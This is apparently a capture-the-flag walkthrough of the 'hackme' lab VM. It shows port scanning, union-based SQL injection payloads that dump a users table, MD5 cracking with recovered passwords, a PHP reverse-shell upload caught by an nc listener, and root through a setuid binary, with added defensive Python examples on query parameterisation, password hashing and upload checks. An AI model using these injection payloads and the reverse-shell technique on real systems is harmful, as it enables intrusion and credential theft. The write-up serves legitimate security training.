hackme VM


Information gathering

┌──(kali㉿kali)-[~/Downloads/hackme]
└─$ sudo nmap --min-rate 10000 -p- 192.1.1.143
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-15 17:01 EDT
Nmap scan report for 192.1.1.143
Host is up (0.00012s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:4F:34:38 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 8.71 seconds

Ports 22 and 80 are open.

┌──(kali㉿kali)-[~/Downloads/hackme]
└─$ sudo nmap -sT -sV -sC -O -p22,80 192.1.1.143
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-15 17:03 EDT
Nmap scan report for 192.1.1.143
Host is up (0.00034s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.7p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 6b:a8:24:d6:09:2f:c9:9a:8e:ab:bc:6e:7d:4e:b9:ad (RSA)
| 256 ab:e8:4f:53:38:06:2c:6a:f3:92:e3:97:4a:0e:3e:d1 (ECDSA)
|_ 256 32:76:90:b8:7d:fc:a4:32:63:10:cd:67:61:49:d6:c4 (ED25519)
80/tcp open http Apache httpd 2.4.34 ((Ubuntu))
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_http-server-header: Apache/2.4.34 (Ubuntu)
MAC Address: 00:0C:29:4F:34:38 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.58 seconds

The OS is Ubuntu. Just in case, also take a look at a UDP port scan:

┌──(kali㉿kali)-[~/Downloads/hackme]
└─$ sudo nmap --top-ports 20 -sU 192.1.1.143
[sudo] password for kali:
Starting Nmap 7.94 ( https://nmap.org ) at 2023-08-15 19:00 EDT
Nmap scan report for 192.1.1.143
Host is up (0.00038s latency).

PORT STATE SERVICE
53/udp closed domain
67/udp closed dhcps
68/udp open|filtered dhcpc
69/udp closed tftp
123/udp closed ntp
135/udp closed msrpc
137/udp closed netbios-ns
138/udp closed netbios-dgm
139/udp closed netbios-ssn
161/udp closed snmp
162/udp closed snmptrap
445/udp closed microsoft-ds
500/udp closed isakmp
514/udp closed syslog
520/udp closed route
631/udp closed ipp
1434/udp closed ms-sql-m
1900/udp closed upnp
4500/udp closed nat-t-ike
49152/udp closed unknown
MAC Address: 00:0C:29:4F:34:38 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 24.57 seconds

Web penetration

Visiting port 80 redirects automatically to a login page. Meanwhile, start directory brute-forcing.

The page looks fairly bare-bones. Tried SQL injection on this form (the "universal password" trick), but it failed.

Registration is available, so register and then log in.

After registering, login succeeds and we land on welcome.php.

The directory brute-force has also returned results:

┌──(kali㉿kali)-[~/Downloads/hackme]
└─$ sudo gobuster dir -u http://192.1.1.143 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
[sudo] password for kali:
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.1.1.143
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2023/08/15 18:59:40 Starting gobuster in directory enumeration mode
===============================================================
/index.php (Status: 200) [Size: 100]
/.php (Status: 403) [Size: 290]
/login.php (Status: 200) [Size: 1245]
/register.php (Status: 200) [Size: 1937]
/uploads (Status: 301) [Size: 312] [--> http://192.1.1.143/uploads/]
/welcome.php (Status: 302) [Size: 0] [--> login.php]
/logout.php (Status: 302) [Size: 0] [--> login.php]
/config.php (Status: 200) [Size: 0]
/.php (Status: 403) [Size: 290]
/server-status (Status: 403) [Size: 299]
Progress: 436644 / 441122 (98.98%)
===============================================================
2023/08/15 19:00:25 Finished
===============================================================

Had a look at the uploads directory; there is no entry point for uploading files there.

SQL injection

Back to the search box on that page: capture the request with Burp Suite and fuzz it with a wordlist.

It looks like there is an injection point, so start injecting manually.

Construct:

{base}' or 1=1 #

This now displays every record.

{base}' or 1=1 order by 3 #

{base}' or 1=1 order by 4 #

With order by 4 there is no output; with order by 3 all records are shown, so the query has three columns.

Construct:

{base}' and 1=2 union select 1,2,3 #

Columns 1, 2 and 3 are all echoed back to the page.

Next, the classic MySQL injection routine: tables, then columns, then rows.

{base}' and 1=2 union select group_concat(table_name),2,3 from information_schema.tables where table_schema = 'webapphacking' #

{base}' and 1=2 union select group_concat(column_name),2,3 from information_schema.columns where table_name = 'users' #

{base}' and 1=2 union select group_concat(id,0x2d,user,0x2d,pasword,0x2d,name,0x2d,address),2,3 from users #
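Why the search box above accepts these payloads, and what the fix looks like, as an added example that is not part of the original writeup: a sqlite3 stand-in for the target's MySQL `users` table (column names follow the dump, including the misspelled `pasword`), with the search query built by string concatenation beside the parameterised form. sqlite3 uses `--` where MySQL uses `#`, and the search is assumed to match the `name` column.

```python
import sqlite3

# Constructed stand-in for the target's `users` table; sqlite3 replaces MySQL
# so the demo runs offline. MySQL's `#` comment becomes `--` here.
SAMPLE_ROWS = [
    (1, "user1", "5d41402abc4b2a76b9719d911017c592", "David", "Newton Circles"),
    (2, "user2", "6269c4f71a55b24bad0f0267d9be5508", "Beckham", "Kensington"),
    (11, "superadmin", "2386acb2cf356944177746fc92523983", "superadmin", "superadmin"),
]


def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users(id INTEGER, user TEXT, pasword TEXT, name TEXT, address TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?, ?, ?)", SAMPLE_ROWS)
    return con


def search_vulnerable(con, term):
    # The search term is spliced into the SQL text, so a quote in it closes the
    # string literal and whatever follows is parsed as SQL. This is exactly why
    # the page's `' or 1=1` and `union select` payloads work.
    sql = f"SELECT id, user, name FROM users WHERE name = '{term}'"
    return con.execute(sql).fetchall()


def search_hardened(con, term):
    # Bound parameter: the driver sends the term as data, never as SQL, so the
    # same payloads are compared literally against `name` and match nothing.
    sql = "SELECT id, user, name FROM users WHERE name = ?"
    return con.execute(sql, (term,)).fetchall()


if __name__ == "__main__":
    con = make_db()
    print(search_vulnerable(con, "David' or 1=1 -- "))  # every row
    print(search_vulnerable(con, "x' and 1=2 union select id, user, pasword from users -- "))
    print(search_hardened(con, "David' or 1=1 -- "))  # []
```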

Pull the results out, tidy them up a bit and write them to a file named result, remembering to remove the jack user we registered ourselves.

1-user1-5d41402abc4b2a76b9719d911017c592-David-Newton Circles,
2-user2-6269c4f71a55b24bad0f0267d9be5508-Beckham-Kensington,
3-user3-0f359740bd1cda994f8b55330c86d845-anonymous-anonymous,
10-test-05a671c66aefea124cc08b76ea6d30bb-testismyname-testaddress,
11-superadmin-2386acb2cf356944177746fc92523983-superadmin-superadmin,
12-test1-05a671c66aefea124cc08b76ea6d30bb-test1-test1,
13-jack-e10adc3949ba59abbe56e057f20f883e-jack-jack

Password hash cracking

Now for my favourite part, using awk to cut the hash column out of the result file:

awk -F '-' '{print $3}' result > userpasswdhash

Next, hashcat (mode 0 is raw MD5):

hashcat -m 0 -a 0 userpasswdhash --show rockyou.txt
5d41402abc4b2a76b9719d911017c592:hello
6269c4f71a55b24bad0f0267d9be5508:commando
0f359740bd1cda994f8b55330c86d845:p@ssw0rd
05a671c66aefea124cc08b76ea6d30bb:testtest

hashcat is genuinely fast, but one hash apparently did not crack; looking closer, it is superadmin's. The only option left is to try an online lookup site and hope for luck.
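Why the dump above falls to a wordlist in seconds, as an added example that is not part of the original writeup: the site stores unsalted MD5, so one digest per candidate word checks every user at once and identical passwords share a hash (test and test1 above). The constructed wordlist stands in for rockyou.txt, and the second half shows the storage form that does not have this property.

```python
import hashlib
import hmac
import os

# Constructed input: the unsalted MD5 hashes from the dump above, plus a tiny
# wordlist standing in for rockyou.txt.
DUMPED = {
    "user1": "5d41402abc4b2a76b9719d911017c592",
    "user2": "6269c4f71a55b24bad0f0267d9be5508",
    "test": "05a671c66aefea124cc08b76ea6d30bb",
    "test1": "05a671c66aefea124cc08b76ea6d30bb",
}
WORDLIST = ["123456", "password", "hello", "commando", "testtest"]
ROUNDS = 200_000


def crack_md5(hashes, wordlist):
    # No salt: one MD5 per candidate word is compared against every user at
    # once via a lookup table, so cost does not grow with the number of users.
    table = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {user: table.get(h) for user, h in hashes.items()}


def hash_password(password, salt=None):
    # Per-user random salt plus a deliberately slow KDF: the same password gives
    # a different stored value for each user, and every guess costs ROUNDS
    # iterations for that one user only.
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ROUNDS)
    return salt.hex() + "$" + digest.hex()


def verify_password(password, stored):
    salt_hex, digest_hex = stored.split("$", 1)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), ROUNDS)
    # Constant-time comparison so the check itself leaks nothing about the digest.
    return hmac.compare_digest(digest.hex(), digest_hex)


if __name__ == "__main__":
    print(crack_md5(DUMPED, WORDLIST))
    stored = hash_password("testtest")
    print(stored, verify_password("testtest", stored))
```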

Perfect. We now have a pile of usernames and passwords and can try SSH brute-forcing with them.

But since these are the website's credentials, while the brute-force runs we can also log in to the website as superadmin.

It turns out files can be uploaded. Combined with the uploads directory found during directory brute-forcing, the attack path is presumably to upload a reverse-shell file first and then visit it in the browser to get a shell.

Getshell

Upload the classic PHP reverse shell directly, remembering to change the IP and port and to start the listener beforehand. First try uploading it without changing the extension.

There is no filtering at all; the upload succeeds. Visit it:

http://192.1.1.143/uploads/php-reverse-shell.php

The shell connects back:

┌──(kali㉿kali)-[~/Downloads/hackme]
└─$ sudo nc -lvnp 1234
listening on [any] 1234 ...
connect to [192.1.1.128] from (UNKNOWN) [192.1.1.143] 42294
Linux hackme 4.18.0-16-generic #17-Ubuntu SMP Fri Feb 8 00:06:57 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
23:04:21 up 2:04, 0 users, load average: 0.06, 0.46, 0.27
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ uname -a
Linux hackme 4.18.0-16-generic #17-Ubuntu SMP Fri Feb 8 00:06:57 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 00:0c:29:4f:34:38 brd ff:ff:ff:ff:ff:ff
inet 192.1.1.143/24 brd 192.1.1.255 scope global dynamic ens33
valid_lft 1529sec preferred_lft 1529sec
inet6 fe80::20c:29ff:fe4f:3438/64 scope link
valid_lft forever preferred_lft forever
$ which python
/usr/bin/python
$ python -c "import pty;pty.spawn('/bin/bash')"
www-data@hackme:/$ sudo -l
sudo -l
[sudo] password for www-data:
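The upload form above accepted php-reverse-shell.php unchanged and served it from /uploads/. The check below is an added example, not the target's code: it rejects any executable extension anywhere in the name (so a double extension does not slip through), requires the final extension to be on an allowlist whose magic bytes the content must match, refuses embedded PHP tags, and stores the file under a random name so the client never picks the path. The extension and magic-byte lists are constructed.

```python
import os
import secrets

# Extensions the web server may execute. Any such segment anywhere in the name
# is rejected, so "shell.php.jpg" fails just like "shell.php".
EXECUTABLE_EXTS = {"php", "php3", "php4", "php5", "php7", "phtml", "phar", "phps", "htaccess"}
# Allowed final extensions and the leading bytes a genuine file of that type has.
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "png": b"\x89PNG\r\n\x1a\n",
    "gif": b"GIF8",
}


def check_upload(filename, data):
    """Return (accepted, reason, stored_name). stored_name is random so the
    path under /uploads is chosen by the server, not by the client."""
    # Client-supplied names may carry directories or backslashes; keep only the leaf.
    name = os.path.basename(filename.replace("\\", "/")).lower()
    parts = name.split(".")
    if len(parts) < 2 or not parts[0]:
        return False, "missing name or extension", None
    if any(p in EXECUTABLE_EXTS for p in parts[1:]):
        return False, "executable extension in name", None
    ext = parts[-1]
    if ext not in MAGIC:
        return False, "extension not on allowlist", None
    # The Content-Type header is client-controlled; inspect the bytes instead.
    if not data.startswith(MAGIC[ext]):
        return False, "content does not match extension", None
    if b"<?php" in data or b"<?=" in data:
        return False, "embedded PHP tag", None
    return True, "ok", secrets.token_hex(8) + "." + ext


if __name__ == "__main__":
    print(check_upload("php-reverse-shell.php", b"<?php phpinfo(); ?>"))
    print(check_upload("photo.jpg", b"\xff\xd8\xff\xe0" + b"\x00" * 16))
```

Even with this check in place, the uploads directory should be served with PHP execution disabled (for mod_php, `php_admin_flag engine off` in that directory's Apache configuration), so a file that gets past the check is still never run.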

Check which users exist in the passwd file, then try whether the website passwords we cracked let us switch to those accounts. The website talks to a database, so we also need to find the database configuration file in the web root:

www-data@hackme:/var/www/html$ cat config.php
cat config.php
<?php
/* Database credentials. Assuming you are running MySQL
server with default setting (user 'root' with no password) */
define('DB_SERVER', 'localhost');
define('DB_USERNAME', 'root');
define('DB_PASSWORD', 'hackme1qaz@WSX');
define('DB_NAME', 'webapphacking');

/* Attempt to connect to MySQL database */
$link = mysqli_connect(DB_SERVER, DB_USERNAME, DB_PASSWORD, DB_NAME);

// Check connection
if($link === false){
die("ERROR: Could not connect. " . mysqli_connect_error());
}
?>

Privilege escalation

Tried every credential and they all failed, so look in the users' home directories for anything sensitive:

www-data@hackme:/home/hackme$ ls -alih
ls -alih
total 48K
1316877 drwxr-xr-x 5 hackme hackme 4.0K Mar 25 2019 .
1310721 drwxr-xr-x 4 root root 4.0K Mar 26 2019 ..
1316887 -rw------- 1 hackme hackme 5.7K Mar 27 2019 .bash_history
1316878 -rw-r--r-- 1 hackme hackme 220 Sep 12 2018 .bash_logout
1316879 -rw-r--r-- 1 hackme hackme 3.7K Sep 12 2018 .bashrc
1316881 drwx------ 2 hackme hackme 4.0K Mar 13 2019 .cache
1316883 drwx------ 3 hackme hackme 4.0K Mar 13 2019 .gnupg
1316888 drwxrwxr-x 3 hackme hackme 4.0K Mar 21 2019 .local
1316889 -rw------- 1 root root 5.5K Mar 25 2019 .mysql_history
1316880 -rw-r--r-- 1 hackme hackme 807 Sep 12 2018 .profile
1316885 -rw-r--r-- 1 hackme hackme 0 Mar 13 2019 .sudo_as_admin_successful
www-data@hackme:/home/hackme$ cd ../legacy
cd ../legacy
www-data@hackme:/home/legacy$ ls -alih
ls -alih
total 20K
1316893 drwxr-xr-x 2 root root 4.0K Mar 26 2019 .
1310721 drwxr-xr-x 4 root root 4.0K Mar 26 2019 ..
1317196 -rwsr--r-x 1 root root 8.3K Mar 26 2019 touchmenot
www-data@hackme:/home/legacy$ strings touchmenot
strings touchmenot

Command 'strings' not found, but can be installed with:

apt install binutils
Please ask your administrator.

Can't inspect it directly, so just run it and see:

www-data@hackme:/home/legacy$ ./touchmenot
./touchmenot
root@hackme:/home/legacy#

It drops straight into a root shell, which is a bit absurd: a setuid-root binary that is executable by everyone.


hackme VM
https://i3eg1nner.github.io/2023/08/6a3fef14f8e4.html
Author
I3eg1nner
Published on
17 August 2023